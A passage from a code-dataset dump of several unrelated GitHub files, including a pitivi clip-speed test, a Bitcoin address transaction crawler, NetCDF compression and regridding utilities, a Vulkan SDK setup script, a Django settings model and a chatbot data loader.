self.speed_box._speed_adjustment.props.value = 2.0\n self.assert_applied_rate(1, 2.0, clip1_duration / 2)\n\n self.timeline_container.timeline.selection.select([clip2])\n self.assertIs(self.speed_box._clip, clip2)\n self.assert_applied_rate(0, 1.0, clip2_duration)\n\n self.timeline_container.timeline.selection.select([clip1])\n self.assert_applied_rate(1, 2.0, clip1_duration / 2)\n\n @common.setup_project_with_clips(assets_names=[\"1sec_simpsons_trailer.mp4\"])\n @common.setup_clipproperties\n def test_load_project_clip_speed(self):\n sources_count = 2\n clip, = self.layer.get_clips()\n clip.props.duration = Gst.SECOND\n\n self.timeline_container.timeline.selection.select([clip])\n self.speed_box._speed_adjustment.props.value = 0.5\n self.assert_applied_rate(sources_count, 0.5, 2 * Gst.SECOND)\n\n with tempfile.NamedTemporaryFile() as temp_file:\n uri = Gst.filename_to_uri(temp_file.name)\n project_manager = self.app.project_manager\n self.assertTrue(project_manager.save_project(uri=uri, backup=False))\n\n mainloop = common.create_main_loop()\n\n project_manager.connect(\"new-project-loaded\", lambda *args: mainloop.quit())\n project_manager.connect(\"closing-project\", lambda *args: True)\n self.assertTrue(project_manager.close_running_project())\n project_manager.load_project(uri)\n mainloop.run()\n\n new_clip, = self.layer.get_clips()\n self.assertNotEqual(new_clip, clip)\n\n self.timeline_container.timeline.selection.select([new_clip])\n self.assert_applied_rate(sources_count, 0.5, 2 * Gst.SECOND)\n","repo_name":"pitivi/pitivi","sub_path":"tests/test_clipproperties.py","file_name":"test_clipproperties.py","file_ext":"py","file_size_in_byte":32171,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"79"} +{"seq_id":"73607758656","text":"import requests\nfrom Struct.prototype import transaction\nfrom log.bitcoin_tracing_logger import Bitcoin_logger\nimport time\n\nurl = 'https://blockchain.info/rawaddr/{}?limit={}&offset={}'\ndef checkaddress(address, proxy):\n time.sleep(1)\n if ' ' in address:\n return False\n tracing_json_data = address_request(address, proxy, 0, 1)\n return 'error' not in tracing_json_data\n\n\ndef get_address_to_trancation(address):\n transaction_class = transaction(address)\n tracing_json_data = address_request(address)\n transaction_class.default_setting(tracing_json_data)\n Bitcoin_logger.get_logger().info('Address : ' + transaction_class.address)\n Bitcoin_logger.get_logger().info('Transaction Count : ' + str(transaction_class.transaction['n_tx']))\n Bitcoin_logger.get_logger().info('Transaction UPDATE : ' + str(len(transaction_class.transaction['txs'])))\n count = tracing_json_data['n_tx']/5000 \n i = 1\n while count>1:\n tracing_json_data = address_request(address, i)\n transaction_class.tranaction_extend(tracing_json_data['txs'])\n Bitcoin_logger.get_logger().info('Transaction UPDATE : ' + str(len(transaction_class.transaction['txs'])))\n count-=1\n i+=1\n transaction_class.point_to_point_filter()\n return transaction_class\n #Data split && Get Informaction\n\ndef address_request(address, proxy_setting, offset=0, limit=5000):\n url = create_url(address, limit, offset)\n Bitcoin_logger.get_logger().info('[Request]Address: {}, limit: {} , offest: {}'.format(address, limit, offset))\n if proxy_setting:\n return proxy_get_address_to_json(url)\n else:\n return get_address_to_json(url)\n\ndef proxy_get_address_to_json(url):\n Bitcoin_logger.get_logger().info('[Proxy]Request URL : ' + url)\n session = requests.session()\n 
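# The proxy settings just below route the request through Tor's local SOCKS5
# listener. Worth knowing: requests only speaks SOCKS when the optional
# PySocks extra is installed (pip install "requests[socks]"), and the
# "socks5h://" scheme additionally resolves DNS through the proxy, which
# plain "socks5://" does not. Standalone sketch of the same setup as a
# helper:

import requests

def tor_session(port=9050):
    session = requests.session()
    session.proxies = {
        "http": "socks5h://localhost:%d" % port,
        "https": "socks5h://localhost:%d" % port,
    }
    return session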
session.proxies = {}\n session.proxies['http'] = 'socks5://localhost:9050'\n session.proxies['https'] = 'socks5://localhost:9050'\n request_headers = { \n \"accept-language\":\t\"ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7\",\n \"accept-encoding\":\t\"gzip, deflate, br\",\n \"sec-fetch-dest\":\t\"document\",\n \"sec-fetch-user\": \"1\",\n \"sec-fetch-mode\":\t\"navigate\",\n \"sec-fetch-site\":\t\"none\",\n \"accept\":\t\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n \"user-agent\":\t\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36\",\n \"upgrade-insecure-requests\":\t\"1\",\n \"sec-ch-ua-platform\":\t\"macOS\",\n \"sec-ch-ua-mobile\": \"0\",\n \"sec-ch-ua\":\t'Not A;Brand\";v=\"99\", \"Chromium\";v=\"96\", \"Google Chrome\";v=\"96'\n }\n try:\n return session.get(url, headers=request_headers).json()\n except:\n raise Exception(\"Rate Limit Wait Request\")\n\ndef get_address_to_json(url):\n #Bitcoin_logger.get_logger().info('Request URL : ' + url)\n try:\n return requests.get(url).json()\n except:\n raise Exception(\"Rate Limit Wait Request\")\n\ndef create_url(address, limit, offset):\n return url.format(address, limit, offset*limit)\n\nif __name__ == '__main__':\n address = 'bc1qsfxssclfwp3rykwjdl9ghz99j7zmw9yhvdnr2f'\n print(\"ADDRESS : {}\".format(address))\n print(get_address_to_trancation(address))","repo_name":"JangJongMin/Bitcoin_Trace","sub_path":"Module/crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10348060939","text":"# pylint: disable=C0103\n\"\"\"\nnchandy\n~~~~~~~~~\nHandy NetCDF tools\n\nThis package contains functions and tools to work with\n NetCDF files.\n\n:github: https://github.com/isezen/nchandy\n:docs: https://github.com/isezen/nchandy\n:author: Ismail SEZEN (sezenismail@gmail.com)\n\"\"\"\n\nfrom math import log10 as _log10\nfrom math import floor as _floor\nimport logging as _logging\nimport numpy as _np\nimport xarray as _xr\n\nfrom nchandy import file\nfrom nchandy.file import _log\n\n__all__ = ['file', ]\n__version__ = '0.0.1.dev'\n__author__ = 'Ismail SEZEN'\n__email__ = 'sezenismail@gmail.com'\n__license__ = 'AGPL v3.0'\n__year__ = '2022'\n\n# fh = _logging.FileHandler(s.log.file)\n# fh.setLevel(logging.INFO)\n# fh.setFormatter(formatter)\n# log.addHandler(fh)\n_log_level_names_ = ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']\n_log_levels_ = dict(zip(_log_level_names_, range(10, 60, 10)))\n_log_formatter_ = _logging.Formatter(\n '%(asctime)s.%(msecs)03d - %(name)s - %(levelname)s - %(message)s',\n datefmt='%Y-%m-%dT%H:%M:%S')\n\n\ndef _update_is_required_compress(f, quantize=2, dlevel=5):\n \"\"\"Check NetCDF file is compressed or not.\"\"\"\n dp_str = 'precision'\n compression_changed = False\n with _xr.open_dataset(f, engine='netcdf4') as ds:\n for _, v in ds.variables.items():\n if v.encoding['complevel'] != dlevel:\n compression_changed = True\n break\n if dp_str in ds.attrs.keys():\n if ds.attrs[dp_str] is not None and quantize is not None:\n if quantize >= ds.attrs[dp_str]:\n quantize = None\n if quantize is not None:\n compression_changed = True\n return compression_changed\n\n\ndef _update_is_required_regrid(f, lats, lons, dim_names=None):\n \"\"\"Check NetCDF file is regridded previously.\"\"\"\n with _xr.open_dataset(f, engine='netcdf4') as ds:\n 
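# A caution on the comparisons coming up in this function: with NumPy
# coordinate arrays, all(xlats != lats) is True only when *every* element
# differs, so a grid that moved in a single point would be treated as
# already regridded. not np.array_equal(xlats, lats) is the usual robust
# "arrays differ" test (standalone illustration, not a change to the
# function itself):
#
#     import numpy as np
#     a = np.array([0.0, 1.0, 2.0])
#     b = np.array([0.0, 1.0, 9.0])     # differs in one element only
#     assert not all(a != b)            # elementwise test misses it
#     assert not np.array_equal(a, b)   # this catches it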
latn, lonn = _find_dim_names(ds) if dim_names is None \\\n else tuple(dim_names)\n if 'regrid_method' in ds.attrs.keys(): # if contains attribute\n xlats, xlons = ds[latn].values, ds[lonn].values\n if all(xlats != lats):\n return True\n if all(xlons != lons):\n return True\n else:\n return True\n return False\n\n\ndef _set_logger_(name, verbose=False,\n log_level='INFO', logfile=None) -> None:\n _log.name = name\n _log.setLevel(_log_levels_[log_level])\n if verbose:\n handler = _logging.StreamHandler()\n handler.setFormatter(_log_formatter_)\n _log.addHandler(handler)\n if logfile is not None:\n handler = _logging.FileHandler(logfile)\n handler.setFormatter(_log_formatter_)\n _log.addHandler(handler)\n return _log\n\n\ndef _check_ds(ds) -> None:\n ds_types = (_xr.core.dataset.Dataset,\n _xr.core.dataarray.DataArray,\n _xr.core.variable.Variable)\n if not isinstance(ds, ds_types):\n type_names = [str(i).split(\"'\")[1] for i in ds_types]\n type_names = [f\"'{i}'\" for i in type_names]\n type_names = ' or '.join(type_names)\n raise TypeError(f'ds must be an instance of {type_names}.')\n\n\ndef _check_int(x, name) -> None:\n if x is not None:\n if not isinstance(x, int):\n raise TypeError(f'{name} must be integer')\n\n\ndef _check_dlevel(x) -> None:\n _check_int(x, 'dlevel')\n if x is not None:\n if not 0 <= x <= 9:\n raise ValueError('dlevel must be between (0,9)')\n\n\ndef _exp10(x):\n return max(10**(-_floor(_log10(x))) if x > 0 else 1, 1)\n\n\ndef _exp10_2(x):\n return 10**(-_np.floor(_np.log10(x)))\n\n\ndef is_netcdf(f):\n \"\"\"\n Check file is a valid netcdf file.\n\n Args:\n f (FILENAME): A valid file name\n \"\"\"\n try:\n _xr.open_dataset(f, engine='netcdf4')\n except OSError:\n return False\n return True\n\n\ndef scale_ncdf(nco, factor, variables=None, exclude_variables=('TFLAG',)):\n \"\"\"\n Scale netCDF4.Dataset object.\n\n Args:\n nco (netCDF4.Dataset) : NetCDF4.Dataset object\n factor (FLOAT) : Scale factor.\n variables (str|list) : Name of variables to scale.\n exclude_vars (str| list) : Name of variables to exclude from scaling.\n Default is 'TFLAG'.\n Return:\n netCDF4.Dataset object\n \"\"\"\n try:\n from netCDF4 import Dataset as _Dataset # pylint: disable=E0611,C0415\n if not isinstance(nco, _Dataset):\n raise TypeError(\"nco must be an instance of 'netCDF4.Dataset'\")\n except ImportError:\n print('Install netCDF4 library to use this functionality')\n return None\n\n nco_vars = list(nco.variables.keys())\n if variables is None:\n variables = nco_vars\n for k in variables:\n if k not in nco_vars:\n _log.debug(f'Var:{k} was not found in dataset. Skipping!')\n continue\n if k not in exclude_variables:\n nco[k][:] *= factor\n _log.debug(f'{k} variable scaled by {factor}')\n return nco\n\n\ndef scale_xr(ds, factor, variables=None, exclude_variables=('TFLAG',),\n dlevel=5):\n \"\"\"\n Scale NetCDF File by xarray library.\n\n Args:\n ds (xarray.Dataset) : xarray.Dataset object.\n factor (FLOAT) : Scale factor.\n variables (str|list) : Name of variables to scale.\n exclude_vars (str| list) : Name of variables to exclude from scaling.\n dlevel (INT) : Compression/deflate level between [0-9].\n Default is 5.\n Return:\n xarray.Dataset object.\n \"\"\"\n _check_dlevel(dlevel)\n ds = ds.copy(deep=True)\n if variables is None:\n variables = list(ds.variables)\n # log.debug(f'Scaling {from_file}')\n for k in variables:\n if k not in ds.variables:\n _log.debug(f'Var:{k} was not found in dataset. 
Skipping!')\n continue\n if k not in exclude_variables:\n encoding, attrs = ds[k].encoding, ds[k].attrs\n ds[k] = ds[k].astype('float64') * factor\n ds[k].encoding, ds[k].attrs = encoding, attrs\n _log.debug(f'{k} variable scaled by {factor}')\n ds[k].attrs['scale_factor'] = factor\n if dlevel is not None:\n for k in ds.keys():\n ds[k].encoding.update(\n {'dtype': _np.dtype('float32'), 'zlib': True,\n 'complevel': dlevel})\n\n return ds\n\n\ndef scale_emis(ds, factor, dlevel=5):\n \"\"\"\n Scale emission File by xarray library.\n\n Args:\n ds (xarray.Dataset) : xarray.Dataset object.\n factor (FLOAT) : Scale factor.\n dlevel (INT) : Compression/deflate level between [0-9].\n Default is 5.\n Return:\n xarray.Dataset object.\n \"\"\"\n return scale_xr(ds, factor,\n file._emis_vars_, # pylint: disable=W0212\n file._exclude_vars_, # pylint: disable=W0212\n dlevel)\n\n\ndef compress(ds, quantize=None, dlevel=5): # pylint: disable=R0912\n \"\"\"\n Compress a single NetCDF File.\n\n Args:\n ds (xarray.Dataset) : xarray.Dataset object\n quantize (INT) : Decimal precision to truncate data.\n Default is no quantization.\n dlevel (INT) : Compression/deflate level between [0-9].\n Default is 5.\n Return:\n xarray.Dataset object.\n \"\"\"\n _check_ds(ds)\n _check_int(quantize, 'quantize')\n _check_dlevel(dlevel)\n pm_str = 'precision_MAE'\n if isinstance(ds, _xr.core.variable.Variable):\n dt = ds.dtype\n old_enc = ds.encoding.copy()\n if str(ds.dtype).startswith('float') and quantize is not None:\n q = 0.0\n mx = ds.max().values.tolist()\n mn = ds.min().values.tolist()\n # if (ds != 0.0).all():\n # m = ds.where(ds != 0.0)\n # mx, mn = m.max().values.tolist(), m.min().values.tolist()\n # q = m.quantile(q=0.90).values.tolist()\n # q = m.mean().values.tolist()\n # q = m.max().values.tolist()\n # e = _exp10_2(abs(m))\n # e = stats.mode(e)\n # vals, counts = _np.unique(e, return_counts=True)\n # index = _np.argmax(counts)\n # e = vals[index]\n # print(e)\n # e = _exp10(abs(q))\n e = 1\n _log.debug(f'Max: {mx}, Min: {mn}, exp: {e}, q: {q}')\n e = _np.array(e).astype('float64')\n r = (_np.round(ds.astype('float64') * e, quantize) / e).astype(dt)\n mae = _np.max(abs(ds - r)).astype(dt)\n r.attrs[pm_str] = mae.values.tolist()\n ds = r\n if dlevel is not None:\n old_enc.update({'zlib': True, 'shuffle': True,\n 'complevel': dlevel})\n ds.encoding = old_enc\n\n if isinstance(ds, _xr.core.dataarray.DataArray):\n v = compress(ds.variable, quantize, dlevel)\n ds = _xr.DataArray(v, name=ds.name, attrs=v.attrs)\n ds.encoding = v.encoding.copy()\n if pm_str in ds.attrs.keys():\n _log.debug(f'Processed {ds.name}: MAE: {ds.attrs[pm_str]}')\n\n if isinstance(ds, _xr.core.dataarray.Dataset):\n ds2 = ds.copy(deep=True)\n glob_mae = 0\n for k in list(ds2.keys()):\n ds2[k] = compress(ds2[k], quantize, dlevel)\n if pm_str in ds2[k].attrs.keys():\n glob_mae = max(glob_mae, ds2[k].attrs[pm_str])\n\n if quantize is not None:\n ds2.attrs.update({'decimal_precision': quantize,\n pm_str: glob_mae})\n _log.info(f'{pm_str}: {glob_mae}')\n return ds2\n return ds\n\n\ndef _find_dim_names(ds, lat_name='lat', lon_name='lon'):\n \"\"\"\n Find exact lat/lon dimension names in xarray dataset.\n\n Args:\n ds (xarray.Dataset) : xarray Dataset object\n lat_name (str) : lat name to search in coords.\n lon_name (str) : lon name to search in coords.\n Return:\n tuple of lat/lon names\n \"\"\"\n dim_names = list(ds.dims.keys())\n coord = {}\n for j in [lat_name, lon_name]:\n dim_name = {j: i for i in dim_names if j in i}\n if len(dim_name) == 0:\n 
raise ValueError(f'dimension {j} name was not found')\n if len(dim_name) > 1:\n raise ValueError(f'Ambiguous dimension name for {j}')\n coord.update(dim_name)\n return coord[lat_name], coord[lon_name]\n\n\ndef regrid(ds, lats, lons, dim_names=None, # pylint: disable=R0913\n dlevel=5, method='bilinear'):\n \"\"\"\n Regrid xarray dataset.\n\n Args:\n ds (xarray.Dataset) : xarray.Dataset object\n lats (list) : list of latitude values to regrid.\n lons (list) : list of longitude values to regrid.\n dim_names (list|tuple) : name of lat/lon dimensions.\n dlevel (INT) : Compression/deflate level between [0-9].\n Default is 5.\n method (str) : regridding method. (See xesmf.Regridder)\n Return:\n xarray.Dataset object\n \"\"\"\n # try:\n import xesmf as xe # pylint: disable=E0401,C0415\n # except ImportError:\n # print('*** Install xesmf library to use this functionality ***')\n # return None\n _check_dlevel(dlevel)\n latn, lonn = _find_dim_names(ds) if dim_names is None else tuple(dim_names)\n ds = ds.rename({latn: 'lat', lonn: 'lon'})\n ds2 = _xr.Dataset(\n {\n \"lat\": ([\"lat\"], lats),\n \"lon\": ([\"lon\"], lons),\n }\n )\n regridder = xe.Regridder(ds, ds2, method, periodic=True)\n ds2 = regridder(ds)\n if dlevel is not None:\n for k in ds2.keys():\n ds2[k].encoding.update(\n {'dtype': _np.dtype('float32'), 'zlib': True,\n 'complevel': dlevel})\n return ds2\n","repo_name":"isezen/nchandy","sub_path":"nchandy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"26723946948","text":"'''2016년, a월 b일에 해당하는 요일 출력하기'''\n\ndef solution(a, b):\n day = ['FRI', 'SAT','SUN','MON','TUE','WED','THU'] #요일 입력\n date = {1:31, 2:29,3:31,4:30,5:31,6:30,7:31,8:31,9:30,10:31,11:30,12:31} # 딕셔너리를 사용해서 월에 해당하는 일 value 입력\n num =0\n for i in range(1,a): # a-1까지 일을 더하기\n num += date.get(i)\n num = (num+b) % 7 # b만큼 더한 후 7로 나누기\n return day[num-1] # 나머지에 해당하는 값 출력하기\n","repo_name":"bella5065/programmers","sub_path":"2016.py","file_name":"2016.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36655335580","text":"import math\n\nx = int(input())\ny = int(input())\nk = 1\n\nif x == y:\n if x == 1:\n print(1)\n else:\n print(-1)\nelse:\n if x != 1:\n k = math.ceil((x-1)/(y-x))\n print(k*x)\n else:\n print(1)","repo_name":"T1m11/Codeforces","sub_path":"olimp.5.py","file_name":"olimp.5.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73589853376","text":"#!/usr/bin/python\n# -*- coding: iso-8859-1 -*-\n\nimport os\nimport math\n\n# Parameters:\n# C: c -- The complexity parameter C.(default 1.0).\n# L: epsilonParameter -- The epsilon parameter of the epsilon insensitive loss function.(default 0.001).\n\n# Process:\n# L = 1.0 static -> Find optimal C -> C = optimal C static -> Find optimal L -> Final Result\n\n# range with float step\n\ndef frange(start, stop, step=1.0):\n while start < stop:\n yield start\n start +=step\n if start >= 0.1:\n step = 0.1\n else:\n step *= 10\n\n# Greedy - Find optimal parameter C for L=1.0 static -> Find optimal parameter L for C=optimalC static\n\nparams = [1.0E-3, 1.0] # [C, L]\ninit = [1.0E-5, 0.1]\nend = [1.0, 1.0]\nstep = [9.0E-5, 0.1]\nexperiments = [14, 10] # C = 0.00001 0.0001 0.001 0.01 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0; L = 0.1 0.2 
0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0\n\nFEATURE = \"ComParE2015_Parkinson\"\n# FEATURE = \"New_Data_all\"\n\nif os.path.exists('baseline_svm_arff.sh'):\n\n os.system(\"rm print.dep\")\n\n for cont in range(len(params)):\n values = []\n spearman = []\n string = []\n parallel = \"parallel -j \" + str(experiments[cont]) + \" ./baseline_svm_arff.sh {1} {2} \" + FEATURE\n for i in range(len(params)):\n string.append(\" ::: \" + str(params[i]))\n string[cont] = \" :::\"\n for param in frange(init[cont], end[cont], step[cont]):\n values.append(param)\n string[cont] += \" \" + str(param)\n for i in range(len(params)):\n parallel += string[i]\n f = open(\"print.dep\", \"a\")\n f.write(\"Training \" + parallel + \"\\n\")\n f.close()\n os.system(parallel)\n for exp in range(experiments[cont]):\n params[cont] = values[exp]\n if os.path.exists('eval/train_devel/'+FEATURE+'.SVR.C'+str(params[0])+'.L'+str(params[1])+'.result'):\n file = open('eval/train_devel/'+FEATURE+'.SVR.C'+str(params[0])+'.L'+str(params[1])+'.result', 'r')\n data = file.readlines();\n for x in data:\n line = x.split(\" \");\n s = line[len(line)-1]\n spearman.append(float(s))\n file.close()\n f = open(\"print.dep\", \"a\")\n f.write(\"Results for model C=\"+str(params[0])+\" L=\"+str(params[1]) + \"\\n\")\n f.write(\"Spearman correlation coefficient: \" + s + \"\\n\")\n f.close()\n else:\n spearman.append(0)\n f = open(\"print.dep\", \"a\")\n f.write(\"The result file for C=\"+str(params[0])+\" and L=\"+str(params[1])+\" has not been created\" + \"\\n\")\n f.close()\n index = spearman.index(max(spearman))\n params[cont] = values[index]\n\n f = open(\"print.dep\", \"a\")\n f.write(\"Optimal C = \" + str(params[0]) + \"\\n\")\n f.write(\"Optimal L = \" + str(params[1]) + \"\\n\")\n\n f.write(\"Retraining final model C = \" + str(params[0]) + \" and L = \" + str(params[1]) + \"\\n\")\n f.close()\n os.system('./baseline_svm_arff.sh '+str(params[0])+' '+str(params[1]))\n file = open('eval/train_devel/'+FEATURE+'.SVR.C'+str(params[0])+'.L'+str(params[1])+'.pred', 'r')\n data = file.readlines();\n err = []\n valor = []\n for x in data:\n line = x.split(\" \");\n line_rel = []\n for l in range(len(line)):\n if line[l] != '':\n line_rel.append(line[l])\n if len(line_rel) == 5:\n valor.append(float(line_rel[1]))\n err.append(float(line_rel[3]))\n error = 0\n rmse = 0\n for e in range(len(err)):\n error += abs(err[e])/(valor[e]*len(err))\n rmse += err[e]*err[e]/len(err)\n rmse = math.sqrt(rmse)\n file.close()\n file = open('eval/train_devel/'+FEATURE+'.SVR.C'+str(params[0])+'.L'+str(params[1])+'.result', 'r')\n data = file.readlines();\n for x in data:\n line = x.split(\" \");\n s = line[len(line)-1]\n spearman.append(float(s))\n file.close()\n f = open(\"print.dep\", \"a\")\n f.write(\"Spearman correlation coefficient final: \" + s + \"\\n\")\n f.write(\"RMSE: \" + str(rmse) + \"\\n\")\n f.write(\"RELATIVE ERROR: \" + str(error) + \"\\n\")\n\n f.write(\"Retraining initial model C = 0.001 and L = 1.0\" + \"\\n\")\n f.close()\n os.system('./baseline_svm_arff.sh 0.001 1.0')\n file = open('eval/train_devel/'+FEATURE+'.SVR.C0.001.L1.0.pred', 'r')\n data = file.readlines();\n err = []\n valor = []\n for x in data:\n line = x.split(\" \");\n line_rel = []\n for l in range(len(line)):\n if line[l] != '':\n line_rel.append(line[l])\n if len(line_rel) == 5:\n valor.append(float(line_rel[1]))\n err.append(float(line_rel[3]))\n error = 0\n rmse = 0\n for e in range(len(err)):\n error += abs(err[e])/(valor[e]*len(err))\n rmse += err[e]*err[e]/len(err)\n rmse = 
math.sqrt(rmse)\n file.close()\n file = open('eval/train_devel/'+FEATURE+'.SVR.C0.001.L1.0.result', 'r')\n data = file.readlines();\n for x in data:\n line = x.split(\" \");\n s = line[len(line)-1]\n spearman.append(float(s))\n file.close()\n f = open(\"print.dep\", \"a\")\n f.write(\"Spearman correlation coefficient initial: \" + s + \"\\n\")\n f.write(\"RMSE: \" + str(rmse) + \"\\n\")\n f.write(\"RELATIVE ERROR: \" + str(error) + \"\\n\")\n\nelse:\n f = open(\"print.dep\", \"a\")\n f.write(\"The bash script baseline_svm_arff.sh has not been created\")\n f.close()\n","repo_name":"clara-jr/Parkinson-Machine-Learning","sub_path":"baseline2/optimize.py","file_name":"optimize.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72009186815","text":"import os\nimport sys\nimport subprocess\nimport platform\nfrom pathlib import Path\n\nif platform.system() == \"Windows\":\n import UtilsWindows as Utils\nelif platform.system() == \"Linux\":\n import UtilsLinux as Utils\n\nfrom io import BytesIO\nfrom urllib.request import urlopen\n\nclass VulkanConfiguration:\n requiredVulkanVersion = \"1.3.\"\n installVulkanVersion = \"1.3.216.0\"\n vulkanDirectory = \"./Labyrinth/dependencies/VulkanSDK\"\n\n if platform.system() == \"Windows\":\n vulkanPlatform = \"windows\"\n vulkanFilename = \"vulkan_sdk.exe\"\n vulkanExecPath = f\"{vulkanDirectory}/VulkanSDK-{installVulkanVersion}-Installer.exe\"\n elif platform.system() == \"Linux\":\n vulkanPlatform = \"linux\"\n vulkanFilename = \"vulkan_sdk.tar.gz\"\n vulkanExecPath = f\"{vulkanDirectory}/{installVulkanVersion}/vulkan_sdk\"\n\n @classmethod\n def Validate(cls):\n if (not cls.CheckVulkanSDK()):\n print(\"Vulkan SDK not installed correctly.\")\n return\n \n if (not cls.CheckVulkanSDKDebugLibs()):\n print(f\"\\nNo Vulkan SDK debug libs found. Install Vulkan SDK with debug libs.\")\n print(f\"\\nDebug configuration disabled.\")\n\n @classmethod\n def CheckVulkanSDK(cls):\n vulkanSDK = os.environ.get(\"VULKAN_SDK\")\n if (vulkanSDK is None):\n print(\"\\nYou don't have the Vulkan SDK installed!\")\n cls.__InstallVulkanSDK()\n return False\n else:\n print(f\"\\nLocated Vulkan SDK at {vulkanSDK}\")\n\n if (cls.requiredVulkanVersion not in vulkanSDK):\n print(f\"You don't have the correct Vulkan SDK version! (Engine requires {cls.requiredVulkanVersion})\")\n cls.__InstallVulkanSDK()\n return False\n \n print(f\"Correct Vulkan SDK located at {vulkanSDK}\")\n return True\n\n @classmethod\n def __InstallVulkanSDK(cls):\n permissionGranted = False\n while not permissionGranted:\n reply = str(input(\"Would you like to install VulkanSDK {0:s}? 
[Y/N]: \".format(cls.installVulkanVersion))).lower().strip()[:1]\n if reply == 'n':\n return\n permissionGranted = (reply == 'y')\n\n vulkanInstallURL = f\"https://sdk.lunarg.com/sdk/download/{cls.installVulkanVersion}/{cls.vulkanPlatform}/{cls.vulkanFilename}\"\n vulkanInstallPath = f\"{cls.vulkanDirectory}/{cls.vulkanFilename}\"\n print(\"Downloading {0:s} to {1:s}\".format(vulkanInstallURL, vulkanInstallPath))\n Utils.DownloadFile(vulkanInstallURL, vulkanInstallPath)\n print(\"Running Vulkan SDK installer...\") \n if platform.system() == \"linux\":\n print(\"Extracting\", vulkanInstallPath)\n Utils.UnpackFile(vulkanInstallPath, [], True)\n os.startfile(os.path.abspath(vulkanExecPath))\n print(\"Re-run this script after installation!\")\n quit()\n\n @classmethod\n def CheckVulkanSDKDebugLibs(cls):\n vulkanSDK = os.environ.get(\"VULKAN_SDK\")\n shadercdLib = Path(f\"{vulkanSDK}/Lib/shaderc_sharedd.lib\")\n \n return shadercdLib.exists()\n\nif __name__ == \"__main__\":\n VulkanConfiguration.Validate()","repo_name":"amayesingnathan/LabyrinthEngine","sub_path":"scripts/python/VulkanSetup.py","file_name":"VulkanSetup.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"70997992894","text":"from django.db import models\n\n\nclass Configuracao(models.Model):\n DISPONIBILIDADES_CHOICES = (\n (1, 'Um dia'),\n (3, 'Três dias'),\n (7, 'Uma semana dias'),\n (30, 'Um mês'),\n )\n\n enviar_msg = models.BooleanField(\n auto_created=True,\n default=True,\n verbose_name='Enviar mensagens automaticas'\n )\n grupos_permissao = models.BooleanField(\n auto_created=True,\n default=False,\n verbose_name='Grupos de permissões padrão criados'\n )\n agendamento = models.BooleanField(\n auto_created=True,\n default=True,\n verbose_name='Disponível para agendamento'\n )\n fidelidade = models.BooleanField(\n auto_created=True,\n default=False,\n verbose_name='Plano fidelidade'\n )\n validade = models.IntegerField(\n default=0,\n verbose_name='Quantidade em dias para a valide da fidelização'\n )\n quantidade_fidelidade = models.IntegerField(\n default=0,\n verbose_name='Qntd de serviços concluidos para completar a fidelização'\n )\n endereco = models.CharField(max_length=200, blank=False, null=False)\n instagram = models.URLField(max_length=200, blank=True, null=True)\n whatsapp = models.CharField(max_length=11, blank=False, null=False)\n celular = models.CharField(max_length=11, blank=False, null=False)\n gerar_disponibilidade = models.IntegerField(\n choices=DISPONIBILIDADES_CHOICES,\n default=1\n )\n horarios = models.ManyToManyField(\n 'horarios.Horario',\n related_name='configuracao_horario'\n )\n","repo_name":"Juzeka/Agendeer","sub_path":"configuracoes/models/configuracao.py","file_name":"configuracao.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"4972911086","text":"import copy\nimport pickle\nimport nltk\nimport numpy as np\nimport torch\nimport json\nfrom torch.utils.data import Dataset, DataLoader\nfrom nltk.stem.porter import PorterStemmer\nstemmer = PorterStemmer()\ntorch.manual_seed(0)\n\n\ndef load_data(path):\n with open(path, 'r') as f:\n intents = json.load(f)\n return intents\n\n\nclass ChatDataGram(Dataset):\n\n def __init__(self, X, y):\n self.n_samples = len(X)\n self.x = X\n self.y = y\n\n def __getitem__(self, index):\n return self.x[index], self.y[index]\n\n def __len__(self):\n return 
self.n_samples\n\n\ndef load_data_gram(X, y, batch_size):\n dataset = ChatDataGram(X, y)\n return DataLoader(dataset=dataset, batch_size=batch_size, shuffle=True)\n\n\ndef tokenize(sentence):\n return nltk.word_tokenize(sentence)\n\n\ndef stem(word):\n return stemmer.stem(word.lower())\n\n\ndef bag_of_words(tokenized_sentence, words):\n # stem each word\n sentence_words = [stem(word) for word in tokenized_sentence]\n # initialize bag with 0 for each word\n bag = np.zeros(len(words), dtype=np.float32)\n for idx, w in enumerate(words):\n if w in sentence_words:\n bag[idx] = 1\n\n return bag\n\n\ndef pattern_tag_words(intents, ignore_words, all_words_PIK):\n all_words = []\n tags = []\n patterns = []\n\n for intent in intents['intents']:\n tag = intent['tag']\n tags.append(tag)\n for pattern in intent['patterns']:\n w = tokenize(pattern)\n all_words.extend(w)\n patterns.append((w, tag))\n\n all_words = [stem(w) for w in all_words if w not in ignore_words]\n all_words = sorted(set(all_words))\n tags = sorted(set(tags))\n\n print(\"Dumping all_words\")\n with open(all_words_PIK, \"wb\") as f:\n pickle.dump({'all_words': all_words, 'tags': tags}, f)\n print(\"Done Dumping\")\n\n return patterns, tags, all_words\n\n\ndef get_x_y(patterns, tags, all_words):\n X_train = []\n 